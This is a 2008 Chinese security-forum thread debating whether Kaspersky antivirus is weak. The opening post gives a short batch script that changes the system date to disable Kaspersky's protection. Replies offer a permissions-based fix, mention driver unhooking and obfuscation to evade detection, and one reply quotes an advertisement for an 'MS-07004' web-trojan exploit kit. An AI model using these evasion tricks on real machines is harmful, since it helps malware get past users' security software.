标题:
[讨论]卡巴真的如此之弱?
[打印本页]
作者:
wlfjck
时间:
2008-7-24 17:23
标题:
[讨论]卡巴真的如此之弱?
[讨论]卡巴真的如此之弱?
议题作者:peter_yu
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
最近网上盛传一种终止卡巴防护的代码,更有甚者在病毒中添加了此功能,就是更改系统时间,而其确实也能终止xp下kav的防护,不过可能无法终止当设置权限为不允许更改系统时间时的kav…………
普通脚本代码:
@echo off
set date=%date%
date 1981-01-12
ping -n 45 localhost > nul
date %date%
卡巴竟会犯如此低级的错误?
帖子53 精华
4
积分3207 阅读权限100 性别男 来自crsky 在线时间99 小时 注册时间2006-2-26 最后登录2008-6-26
查看详细资料
TOP
赚更多的钱
剑客留香
晶莹剔透§烈日灼然
作者:
喂食猫
时间:
2008-7-24 17:23
由于卡巴斯基会为了防止盗版,实时检测系统日期,以判断软件是否已经超过授权的使用期限。当发现软件许可过期时会立即关闭所有的监控,同时主程序也无法扫描病毒,并且需要用户输入新的序列号。所以这是没办法的事,一直以来KABA一直如此!
帖子17 精华
0
积分62 阅读权限40 在线时间13 小时 注册时间2006-10-5 最后登录2007-5-7
查看详细资料
TOP
赚更多的钱
wyf_1009
晶莹剔透§烈日灼然
作者:
风的方向
时间:
2008-7-24 17:23
看到小金猪网页上写,可以通过使咔吧的驱动脱钩来实现过主防的目的
不知道这个是怎么实现的。
帖子14 精华
0
积分33 阅读权限40 性别男 在线时间11 小时 注册时间2006-8-30 最后登录2008-6-9
查看详细资料
TOP
少女暴富的隐秘(图)
my咖啡
晶莹剔透§烈日灼然
作者:
zqm
时间:
2008-7-24 17:23
卡巴的反盗版功能也是他的缺陷,
自己修改下电脑的权限就可以了
在 本地策略—用户权利指派—更改系统时间 里面把所有的帐户都删除
这样这段代码就没有用了.
帖子9 精华
0
积分34 阅读权限40 在线时间15 小时 注册时间2007-1-11 最后登录2008-6-17
查看详细资料
TOP
net-owl
荣誉会员
作者:
天下无敌
时间:
2008-7-24 17:23
楼上的兄弟说的倒是有些意思,利用权限解决问题。
恩,不错当你把不可能变成可能,你会发现你已经被称为高手
帖子158 精华
2
积分3724 阅读权限100 性别男 来自北京 在线时间19 小时 注册时间2006-1-14 最后登录2008-5-4
查看个人网站
查看详细资料
TOP
让女孩一夜变的更有女人味
pixy
荣誉会员
作者:
剑心
时间:
2008-7-24 17:23
卡巴已赢的中国市场,再说垃圾,使用人都比较多。
现在是经济时代,经济地位决定政治地位!与狼共舞!
帖子395 精华
10
积分4278 阅读权限100 性别男 来自China 在线时间284 小时 注册时间2007-1-3 最后登录2008-7-18
查看详细资料
TOP
少女暴富的隐秘(图)
孤单在湖边
晶莹剔透§烈日灼然
作者:
老虎仔
时间:
2008-7-24 17:23
那这样的话不是很容易就可以KILL掉喀吧么...
作为著名的杀毒软件厂商不是很丢人..简洁是智慧的灵魂!!
帖子6 精华
0
积分23 阅读权限40 性别男 来自⒋ 孤魂野鬼`ヤ 在线时间9 小时 注册时间2007-2-24 最后登录2008-5-25
查看个人网站
查看详细资料
TOP
让女孩一夜变的更有女人味
aoshi
晶莹剔透§烈日灼然
作者:
闲云
时间:
2008-7-24 17:23
呵呵 应该所有的产品都是这样 当被大家摸透时就没威胁了
帖子8 精华
0
积分21 阅读权限40 在线时间50 小时 注册时间2005-8-22 最后登录2008-7-14
查看详细资料
TOP
叛逆
晶莹剔透§烈日灼然
作者:
NSX
时间:
2008-7-24 17:23
过卡巴表面内存一句花指令就可以过..楼主的这代码可以过主动吧..
帖子6 精华
0
积分23 阅读权限40 性别男 在线时间8 小时 注册时间2007-2-16 最后登录2007-12-2
查看详细资料
TOP
叛逆
晶莹剔透§烈日灼然
作者:
yemao4587
时间:
2008-7-24 17:23
不过卡巴的主动防御要是不用脚本过得了那应该也是高手了吧..
主动防御不错.就喜欢它的主动 [s:39]
帖子6 精华
0
积分23 阅读权限40 性别男 在线时间8 小时 注册时间2007-2-16 最后登录2007-12-2
查看详细资料
TOP
gzy21cn
晶莹剔透§烈日灼然
作者:
powerfive
时间:
2008-7-24 17:23
这可能是一个漏洞,但卡巴在其它方面确实比很多杀毒软件强,这是不可否认的事实!
帖子9 精华
0
积分31 阅读权限40 性别男 在线时间21 小时 注册时间2007-2-18 最后登录2008-7-15
查看详细资料
TOP
金州
智囊团成员
作者:
=wayne=
时间:
2008-7-24 17:23
每种反病毒软件都有其长处,短处。
测试反病毒软件个人感觉主要应该用病毒来测试。
尽量不要用一些木马和一些脚本之类的。
木马和一些远程控制软件异曲同工,有很多机器上有正常的控制软件。
对木马这类的防御更多的不是依靠反病毒软件。而是一些检测判断工具和经验。
关于卡巴的利弊,小小举例一个,
卡巴斯基6.0可以拦截irq中断。这一点会造成一些用户麻烦。甚至在一些电脑上偶然会蓝屏。
但是从另一个角度看,这一点可却说明这个反病毒软件反病毒深度是很强的。
关于反病毒软件,用或者不用,用那一种,罗卜咸菜,各有所爱了。哈哈
不过感觉简单的说它弱,不是很准确。我相信来这里的很多人可能根本不用反病毒软件。或者不大会仅仅依靠反病毒软件。猜测。
以上个人看法。不具权威。:::))人情如冰六月寒,花做一份艳,为谁笑人间?如果任何人发现我转载的有图像的文章中图像失效或者文章有问题,请及时短消息通知我。先谢谢。::)) coup de foudre
帖子1244 精华
8
积分6154 阅读权限150 性别男 在线时间593 小时 注册时间2005-3-18 最后登录2008-6-6
查看详细资料
TOP
hanjianshuo
晶莹剔透§烈日灼然
作者:
paul
时间:
2008-7-24 17:23
卡吧还是比较好用 主动防御真的很不错 其实没有完美的东东的哦
帖子4 精华
0
积分16 阅读权限40 性别男 在线时间5 小时 注册时间2006-5-1 最后登录2008-3-26
查看详细资料
TOP
叛逆
晶莹剔透§烈日灼然
作者:
佳仔
时间:
2008-7-24 17:23
卡巴对加过冷花指令的杀伤力为0,还没有国内的瑞星强.现在觉得卡巴比不上瑞星..而且性能消耗方面也比不上国产的瑞星..所以..卡巴除了一个主动防御,没有什么好的.(代表我个人观点..)
帖子6 精华
0
积分23 阅读权限40 性别男 在线时间8 小时 注册时间2007-2-16 最后登录2007-12-2
查看详细资料
TOP
bearorc
晶莹剔透§烈日灼然
作者:
XYFHID
时间:
2008-7-24 17:23
卡巴用的人多了,自然它的免杀也会多起来,不过它还是很好用的,修改时间的问题我觉得还是提醒下他们,发封信过去吧...让他们用别的方法反盗版..呵呵
帖子3 精华
0
积分13 阅读权限40 在线时间0 小时 注册时间2007-1-14 最后登录2007-12-18
查看详细资料
TOP
帅得不敢出门
晶莹剔透§烈日灼然
作者:
auqa
时间:
2008-7-24 17:23
瑞星的特征码很难改的 有的是不能改 这个做免杀时定位很简单但要一改程序就不能运行了
这点瑞星还是做的很好 现在其表面查杀功能也变强了
帖子11 精华
0
积分41 阅读权限40 性别男 在线时间13 小时 注册时间2007-3-4 最后登录2008-3-28
查看详细资料
TOP
赵子岩
惟一
晶莹剔透§烈日灼然
作者:
langchen
时间:
2008-7-24 17:23
引用:
引用第2楼wyf_1009于2007-02-23 16:48发表的:
看到小金猪网页上写,可以通过使咔吧的驱动脱钩来实现过主防的目的
不知道这个是怎么实现的。
http://xxxxxxxxxx.uu1001.com/read.php?tid=632
小金猪 MS-07004网马 V2.0
主要特点
延时申请内存,达到不卡IE 的目的,另外有Cookie鉴别功能
24小时内只中一次,可以确保隐蔽性!
是目前唯一可以在内存128兆计算机下运行的MS-07004网马
本软件仅供测试之用,请不要用于非法途径!
帖子122 精华
2
积分302 阅读权限40 在线时间63 小时 注册时间2006-10-22 最后登录2008-7-24
查看详细资料
TOP
Helvin
团队决策人
作者:
XIELLP
时间:
2008-7-24 17:23
我装了两次卡巴,两次最终都打不开了。现在用诺顿幸福,那就是……我饿了,看别人手里拿个肉包子,那他就比我幸福;我冷了,看别人穿了一件厚棉袄,他就比我幸福;我想上茅房,就一个坑,你蹲那了,你就比我幸福。
帖子646 精华
22
积分5001 阅读权限255 在线时间1765 小时 注册时间2005-1-7 最后登录2008-7-23
查看详细资料
TOP
一挥衣袖
晶莹剔透§烈日灼然
作者:
草本刚
时间:
2008-7-24 17:23
这个好像脱离了杀软的强弱的讨论范围了,不过卡巴似乎也应该加强对这方面的恶意利用的防范了。
帖子4 精华
0
积分16 阅读权限40 性别男 在线时间6 小时 注册时间2007-3-7 最后登录2008-5-15
查看详细资料
TOP
sixiang
晶莹剔透§烈日灼然
作者:
车BB
时间:
2008-7-24 17:23
最不爽是玩游戏时候。监控太强。
帖子1 精华
0
积分6 阅读权限40 性别男 在线时间7 小时 注册时间2007-1-29 最后登录2008-6-3
查看详细资料
TOP
lalaliu
晶莹剔透§烈日灼然
作者:
ming312
时间:
2008-7-24 17:23
卡巴已赢的中国市场,再说垃圾,使用人都比较多。
现在是经济时代,经济地位决定政治地位!一点都不错
帖子1 精华
0
积分6 阅读权限40 在线时间0 小时 注册时间2007-2-14 最后登录2008-2-24
查看详细资料
TOP
fishcpu
晶莹剔透§烈日灼然
作者:
纯银
时间:
2008-7-24 17:23
我现在用的是nod,感觉比卡巴好用
帖子2 精华
0
积分9 阅读权限40 在线时间1 小时 注册时间2007-2-9 最后登录2007-3-9
查看详细资料
TOP
yongmin
晶莹剔透§烈日灼然
作者:
jilang
时间:
2008-7-24 17:23
卡巴的主动防御不错啊。即使有这样的漏洞,可以再加个ssm这样就可以双重保护你的电脑。
帖子12 精华
0
积分38 阅读权限40 性别男 在线时间96 小时 注册时间2006-1-4 最后登录2008-7-23
查看详细资料
TOP
376497571
晶莹剔透§烈日灼然
作者:
vincentyip
时间:
2008-7-24 17:23
越是出名用的人多几越被人搞破坏,vista的盗版问题是个典型案例(比以往的操作系统出现盗版时间周期最短)
帖子3 精华
0
积分16 阅读权限40 性别男 在线时间9 小时 注册时间2007-3-4 最后登录2008-1-23
查看详细资料
TOP
mike81fang
晶莹剔透§烈日灼然
作者:
冷酷鲨鱼
时间:
2010-4-24 20:10
呵呵。
作者:
冷酷鲨鱼
时间:
2010-4-24 20:11
呵呵。
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2